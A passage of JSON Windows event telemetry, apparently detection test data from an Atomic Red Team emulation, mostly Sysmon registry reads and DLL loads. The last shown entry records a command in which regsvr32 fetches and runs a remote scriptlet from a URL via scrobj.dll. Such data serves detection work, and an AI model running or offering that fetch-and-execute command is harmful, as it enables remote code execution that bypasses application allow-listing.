"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\System32\\sfc_os.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "scrobj.dll", - "image_path": "C:\\Windows\\System32\\scrobj.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236200016, - "unique_pid": "{00000000-0000-0000-0000-000000000000}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-55A4EE79.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 